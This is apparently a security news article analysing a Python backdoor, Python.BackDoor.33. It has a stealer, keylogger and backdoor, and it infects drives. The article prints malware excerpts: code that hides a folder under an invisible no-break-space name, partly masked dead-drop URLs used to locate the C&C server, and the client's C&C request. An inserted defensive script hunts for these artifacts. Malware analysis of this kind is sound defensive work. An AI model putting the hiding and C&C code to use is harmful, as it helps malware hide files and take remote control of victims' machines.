A newly discovered backdoor written in Python has been detected as Python.BackDoor.33. It has 3 notable features (stealer, keylogger, backdoor) that allow attackers to take full control of an infected device.
Recent threats mainly have backdoor capabilities with many advanced features, such as keylogger, screen capture, webcam, voice recorder, file browser, remote command shell and install/uninstall features.
The malware authors used some advanced techniques to pack this Trojan to evade antivirus detection.
It contains a packed malicious utility file that helps to run Python scripts as ordinary Windows executable files. The functions of this malicious program are implemented in the file mscore.pyc.
Once this backdoor has infected the victim's device, it saves a copy of its file on a drive and modifies a Windows Registry key to confirm that it has successfully launched and shut down the script.
The backdoor's main malicious function executes only after the computer is restarted. Once the system has restarted successfully, the Trojan infects all drives from C to Z.
It then creates a hidden folder, copies its executable into it, and places in the root directory a link that refers to the malicious executable file. All files other than .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.
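    # unichr(160) is U+00A0 (no-break space), so the folder name looks blank
    hidden_folder = os.path.join(drive, unichr(160))
    if not os.path.exists(hidden_folder):
        os.mkdir(hidden_folder)
        # 2 = FILE_ATTRIBUTE_HIDDEN
        ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)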
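A hunting check for the drive-root artifacts described above, as an added example that is not from the article or from Dr.Web: it flags folders whose names consist only of invisible characters (such as U+00A0) and the .lnk, .vbs and VolumeInformation.exe files the article says remain in the root. The function names and the constructed sample tree in demo() are assumptions made for illustration.

```python
import os
import tempfile
import unicodedata

FILE_ATTRIBUTE_HIDDEN = 0x2  # the value 2 passed to SetFileAttributesW in the excerpt
ROOT_SUFFIXES = (".lnk", ".vbs")          # per the article, left in the drive root
ROOT_NAMES = ("volumeinformation.exe",)   # per the article, left in the drive root


def is_invisible_name(name):
    """True if the name is only whitespace/format/control characters (e.g. U+00A0)."""
    return bool(name) and all(
        ch.isspace() or unicodedata.category(ch) in ("Cf", "Cc") for ch in name)


def is_hidden(path):
    """Windows hidden attribute; always False where st_file_attributes is absent."""
    return bool(getattr(os.stat(path), "st_file_attributes", 0) & FILE_ATTRIBUTE_HIDDEN)


def scan_root(root):
    """Report invisible-named folders and leftover launcher files in one drive root."""
    findings = {"invisible_dirs": [], "root_artifacts": []}
    for entry in os.scandir(root):
        lowered = entry.name.lower()
        if entry.is_dir(follow_symlinks=False) and is_invisible_name(entry.name):
            findings["invisible_dirs"].append({
                "name": ascii(entry.name),               # escaped so it is visible in reports
                "hidden": is_hidden(entry.path),
                "entries": len(os.listdir(entry.path)),  # items sitting inside the folder
            })
        elif entry.is_file() and (lowered.endswith(ROOT_SUFFIXES) or lowered in ROOT_NAMES):
            findings["root_artifacts"].append(entry.name)
    findings["root_artifacts"].sort()
    return findings


def demo():
    """Constructed sample tree mimicking the layout the article describes."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "\u00a0"))
    os.mkdir(os.path.join(root, "Projects"))  # ordinary folder, must not be flagged
    for rel in ("\u00a0/report.docx", "Documents.lnk", "notes.txt"):
        open(os.path.join(root, rel), "w").close()
    return scan_root(root)


if __name__ == "__main__":
    print(demo())
```

On a Windows host, call scan_root() once per drive root; the "hidden" field is only meaningful there, since other platforms do not expose st_file_attributes.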
The Trojan tries to identify the IP address and an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.
    url_list = [
        'http://pastebin.com/raw/xf****iX',
        'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs',
        'http://notes.io/r***H'
    ]
According to a Dr.Web researcher, if the backdoor succeeds in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response, it downloads Python scripts, added to the Dr.Web virus databases as Python.BackDoor.35, from the C&C server and runs them on the infected device.
    GLOBAL_SOCKET.sendall(str({
        'mode': 'buildClient',
        'from': 'client',
        'payload': '{}'.format(MODERATOR),  # MODERATOR = "UPX"
        'key': '',
        'module_id': '',
        'session_id': ''}) + '[ENDOFMESSAGE]')
The malicious Python scripts implement 3 main features (stealer, keylogger and backdoor), and the Trojan performs the following activities after infecting the victim's machine.